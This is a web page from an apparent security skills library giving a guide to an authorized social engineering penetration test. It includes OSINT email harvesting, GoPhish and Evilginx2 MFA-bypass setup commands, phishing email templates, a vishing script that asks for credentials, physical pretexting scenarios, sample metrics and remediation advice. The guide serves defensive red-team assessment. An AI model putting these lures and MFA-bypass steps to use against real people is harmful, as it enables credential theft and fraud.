CG
SkillsConducting Social Engineering Penetration Test
Start Free
Back to Skills Library
Penetration Testing๐ŸŸก Intermediate

Conducting Social Engineering Penetration Test

Design and execute a social engineering penetration test including phishing, vishing, smishing, and physical pretexting campaigns to measure human security resilience and identify training gaps.

6 min read8 code examples

Prerequisites

  • Written authorization from senior management (CISO/CTO)
  • Legal review confirming compliance with local laws (CFAA, GDPR, etc.)
  • Defined scope: target employee groups, attack types, exclusions
  • GoPhish server, domain for phishing infrastructure, VPS
  • OSINT tools: Maltego, theHarvester, LinkedIn scraping tools
  • Coordination with HR and Legal for employee notification post-test

Conducting Social Engineering Penetration Test

Overview

Social engineering penetration testing assesses an organization's human attack surface through controlled simulation of real-world deception techniques. According to Verizon DBIR 2024, the human element is involved in approximately 68% of all breaches, with phishing remaining the dominant initial access vector. This guide covers phishing, vishing (voice phishing), smishing (SMS phishing), and physical pretexting campaigns using tools like GoPhish, the Social Engineer Toolkit (SET), and Evilginx.

Prerequisites

  • Written authorization from senior management (CISO/CTO)
  • Legal review confirming compliance with local laws (CFAA, GDPR, etc.)
  • Defined scope: target employee groups, attack types, exclusions
  • GoPhish server, domain for phishing infrastructure, VPS
  • OSINT tools: Maltego, theHarvester, LinkedIn scraping tools
  • Coordination with HR and Legal for employee notification post-test

Phase 1 โ€” OSINT and Target Profiling

Employee Reconnaissance

# Email harvesting
theHarvester -d targetcorp.com -b all -l 500 -f harvester_results

# LinkedIn OSINT (manual + tools)
# Gather: names, roles, departments, email format
# Identify: new hires, IT admins, finance team, executives

# Email format discovery
# Check: first.last@, flast@, firstl@
# Verify with: hunter.io, phonebook.cz, email-checker.net

# Social media OSINT
# Twitter/X: employees posting about work tools/frustrations
# Facebook: corporate event photos, office layout
# GitHub: employee repos with corporate email addresses

# Domain intelligence
dig targetcorp.com MX +short
dig targetcorp.com TXT +short
# Check for SPF, DKIM, DMARC records
# Weak DMARC = easier email spoofing

# Check breach databases (authorized)
# HaveIBeenPwned API for corporate emails
# Identify employees with compromised credentials

Target Selection Matrix

GroupCountPretextAttack Vector
Finance15Invoice approvalPhishing (credential harvest)
IT Help Desk8Password resetVishing
Executives5Board meeting updateSpear phishing
New Hires (< 90 days)12HR onboarding formPhishing (payload)
All Employees200IT security updateBroad phishing

Phase 2 โ€” Phishing Campaign

Infrastructure Setup

# Register lookalike domain
# targetcorp.com -> targetc0rp.com, targetcorp-secure.com, targetcorp.net

# Set up GoPhish server
sudo apt install gophish
# Edit config.json for admin and phishing server ports
gophish

# Configure sending profile in GoPhish
# SMTP server: mail.attackdomain.com
# From: it-security@targetcorp-secure.com
# Headers: proper DKIM/SPF for attack domain

# Create landing page (credential harvesting)
# Clone legitimate login page (Office 365, Okta, etc.)
# GoPhish: Import Site -> https://login.microsoftonline.com
# Enable: Capture Credentials, Capture Passwords
# Redirect to real site after capture

# Set up Evilginx for MFA bypass (authorized testing only)
evilginx2
: config domain attackdomain.com
: config ipv4 <server_ip>
: phishlets hostname o365 login.targetcorp-secure.com
: phishlets enable o365
: lures create o365
: lures get-url 0

GoPhish Campaign Configuration

{
  "campaign": {
    "name": "IT Security Update - Q1 2025",
    "template": {
      "name": "Mandatory Security Training",
      "subject": "Action Required: Complete Security Awareness Training by Friday",
      "html": "<html>...[branded email with urgency]...</html>",
      "from": "IT Security Team <security@targetcorp-secure.com>"
    },
    "landing_page": "Office 365 Login Clone",
    "sending_profile": "Phishing SMTP",
    "groups": ["All Employees - Batch 1"],
    "launch_date": "2025-03-10T09:00:00Z",
    "send_by_date": "2025-03-10T12:00:00Z"
  }
}

Phishing Email Templates by Pretext

Template 1 โ€” IT Security Update:

Subject: [Action Required] Mandatory Password Reset - Security Incident
From: IT Security <security@targetcorp-secure.com>

Dear {FirstName},

Our security team has detected unauthorized access attempts on our systems.
As a precautionary measure, all employees must reset their passwords immediately.

Please click below to reset your password within the next 24 hours:

[Reset Password Now] -> {phishing_url}

Failure to comply may result in temporary account suspension.

Thank you,
IT Security Team

Template 2 โ€” Finance Invoice:

Subject: Invoice #INV-2025-4821 - Approval Required
From: Accounts Payable <ap@targetcorp-secure.com>

Hi {FirstName},

Please review and approve the attached invoice from our vendor.
Amount: $47,250.00 | Due: March 15, 2025

[View Invoice] -> {phishing_url}

Best regards,
Accounts Payable

Phase 3 โ€” Vishing Campaign

Call Script Template

Pretext: IT Help Desk calling about suspicious login

Caller: "Hi, this is [Name] from the IT Help Desk. Am I speaking with [Target Name]?"

[Wait for confirmation]

Caller: "We've detected some unusual login activity on your account from an
unrecognized location. For your protection, I need to verify your identity
before we can investigate further."

Caller: "Can you confirm your employee ID and the email address associated
with your account?"

[Record responses]

Caller: "Thank you. I'm going to send you a verification link to confirm
it's really you. Can you click on it and enter your credentials so we can
secure your account?"

[Send phishing link via email/SMS during call]

Caller: "Great, I can see you've been verified. Your account is now secured.
If you notice any further issues, please call the help desk at [real number]."

Vishing Metrics to Track

MetricDescription
Call answeredTarget picked up the phone
EngagedTarget continued conversation past initial question
Information disclosedTarget provided credentials, employee ID, or PII
Link clickedTarget clicked the verification link
Credentials enteredTarget entered credentials on phishing page
ReportedTarget reported the call to security

Phase 4 โ€” Physical Social Engineering

Physical Pretexting Scenarios

Scenario 1: Delivery Person
- Arrive with package labeled for executive
- Request access to deliver personally
- Attempt to tailgate through secure doors
- Drop USB drives in common areas

Scenario 2: IT Vendor
- Arrive with vendor badge (printed)
- Claim scheduled maintenance on network closet
- Attempt to access server rooms
- Install rogue wireless AP if access gained

Scenario 3: New Employee
- Arrive claiming first day orientation
- Request temporary badge
- Attempt to access restricted areas
- Photograph sensitive screens/documents

Evidence Collection:
- Body camera (if legally permitted and authorized)
- Photographs of accessed areas
- WiFi probe from rogue AP
- Notes on which doors/checkpoints bypassed

Phase 5 โ€” Metrics and Analysis

Campaign Results Dashboard

Phishing Campaign Results:
โ”œโ”€โ”€ Emails Sent: 200
โ”œโ”€โ”€ Emails Delivered: 195 (97.5%)
โ”œโ”€โ”€ Emails Opened: 142 (72.8%)
โ”œโ”€โ”€ Links Clicked: 68 (34.9%)
โ”œโ”€โ”€ Credentials Submitted: 31 (15.9%)
โ”œโ”€โ”€ MFA Bypassed: 8 (4.1%)  [Evilginx]
โ”œโ”€โ”€ Reported to SOC: 12 (6.2%)
โ””โ”€โ”€ No Action: 53 (27.2%)

Vishing Campaign Results:
โ”œโ”€โ”€ Calls Made: 23
โ”œโ”€โ”€ Calls Answered: 18 (78.3%)
โ”œโ”€โ”€ Engaged in Conversation: 15 (65.2%)
โ”œโ”€โ”€ Information Disclosed: 9 (39.1%)
โ”œโ”€โ”€ Credentials Provided: 4 (17.4%)
โ””โ”€โ”€ Reported to Security: 2 (8.7%)

Physical Assessment:
โ”œโ”€โ”€ Tailgating Successful: 3/5 attempts
โ”œโ”€โ”€ USB Drives Plugged In: 2/10 dropped
โ”œโ”€โ”€ Restricted Areas Accessed: 2/4 attempted
โ””โ”€โ”€ Challenged by Employee: 1 time

Risk Scoring

Attack VectorSuccess RateRisk LevelPriority
Phishing (credential harvest)15.9%HighP1
Vishing (info disclosure)39.1%CriticalP1
Physical tailgating60%HighP2
USB drop20%MediumP3
Spear phishing (exec)40%CriticalP1

Phase 6 โ€” Reporting and Recommendations

Remediation Priorities

PriorityRecommendationTimeline
P1Deploy phishing-resistant MFA (FIDO2/WebAuthn)30 days
P1Implement targeted security awareness training14 days
P1Deploy email gateway with URL rewriting30 days
P2Strengthen physical access controls (mantraps, visitor badges)60 days
P2Implement security champion program per department30 days
P3Deploy USB device control policy30 days
P3Establish phishing reporting button in email client14 days

Tools Reference

ToolPurpose
GoPhishPhishing campaign management platform
Evilginx2MFA bypass via reverse proxy phishing
Social Engineer Toolkit (SET)Social engineering attack framework
MaltegoOSINT and relationship mapping
theHarvesterEmail and domain OSINT
King PhisherPhishing campaign tool
ModlishkaReverse proxy for credential interception

Verification Criteria

Confirm successful execution by validating:

  • [ ] All prerequisite tools and access requirements are satisfied
  • [ ] Each workflow step completed without errors
  • [ ] Output matches expected format and contains expected data
  • [ ] No security warnings or misconfigurations detected
  • [ ] Results are documented and evidence is preserved for audit

Compliance Framework Mapping

This skill supports compliance evidence collection across multiple frameworks:

  • SOC 2: CC4.1 (Monitoring & Evaluation), CC7.1 (Monitoring)
  • ISO 27001: A.14.2 (Secure Development), A.18.2 (Information Security Reviews)
  • NIST 800-53: CA-8 (Penetration Testing), RA-5 (Vulnerability Scanning)
  • NIST CSF: ID.RA (Risk Assessment)

Claw GRC Tip: When this skill is executed by a registered agent, compliance evidence is automatically captured and mapped to the relevant controls in your active frameworks.

Deploying This Skill with Claw GRC

Agent Execution

Register this skill with your Claw GRC agent for automated execution:

# Install via CLI
npx claw-grc skills add conducting-social-engineering-penetration-test

# Or load dynamically via MCP
grc.load_skill("conducting-social-engineering-penetration-test")

Audit Trail Integration

When executed through Claw GRC, every step of this skill generates tamper-evident audit records:

  • SHA-256 chain hashing ensures no step can be modified after execution
  • Evidence artifacts (configs, scan results, logs) are automatically attached to relevant controls
  • Trust score impact โ€” successful execution increases your agent's trust score

Continuous Compliance

Schedule this skill for recurring execution to maintain continuous compliance posture. Claw GRC monitors for drift and alerts when re-execution is needed.

References

  • GoPhish: https://getgophish.com/
  • Evilginx2: https://github.com/kgretzky/evilginx2
  • Social Engineer Toolkit: https://github.com/trustedsec/social-engineer-toolkit
  • Verizon DBIR: https://www.verizon.com/business/resources/reports/dbir/
  • NIST SP 800-61: Computer Security Incident Handling Guide

Use with Claw GRC Agents

This skill is fully compatible with Claw GRC's autonomous agent system. Deploy it to any registered agent via MCP, and every execution will be logged in the tamper-evident audit trail.

// Load this skill in your agent
npx claw-grc skills add conducting-social-engineering-penetration-test
// Or via MCP
grc.load_skill("conducting-social-engineering-penetration-test")

Tags

social-engineeringphishingvishingpretextingGoPhishSETOSINTsecurity-awareness

Related Skills

Penetration Testing

Executing Phishing Simulation Campaign

7mยทintermediate
Red Team & Offensive Security

Conducting Social Engineering Pretext Call

5mยทintermediate
Penetration Testing

Conducting External Reconnaissance with OSINT

7mยทintermediate
Phishing Defense

Analyzing Malicious Url with URLScan

3mยทintermediate
Phishing Defense

Implementing Anti Phishing Training Program

3mยทintermediate
Phishing Defense

Implementing DMARC DKIM SPF Email Security

3mยทintermediate

Skill Details

Domain
Penetration Testing
Difficulty
intermediate
Read Time
6 min
Code Examples
8

On This Page

OverviewPrerequisitesPhase 1 โ€” OSINT and Target ProfilingPhase 2 โ€” Phishing CampaignPhase 3 โ€” Vishing CampaignPhase 4 โ€” Physical Social EngineeringPhase 5 โ€” Metrics and AnalysisPhase 6 โ€” Reporting and RecommendationsTools ReferenceReferencesVerification CriteriaCompliance Framework MappingDeploying This Skill with Claw GRC

Deploy This Skill

Add this skill to your Claw GRC agent and start automating.

Get Started Free โ†’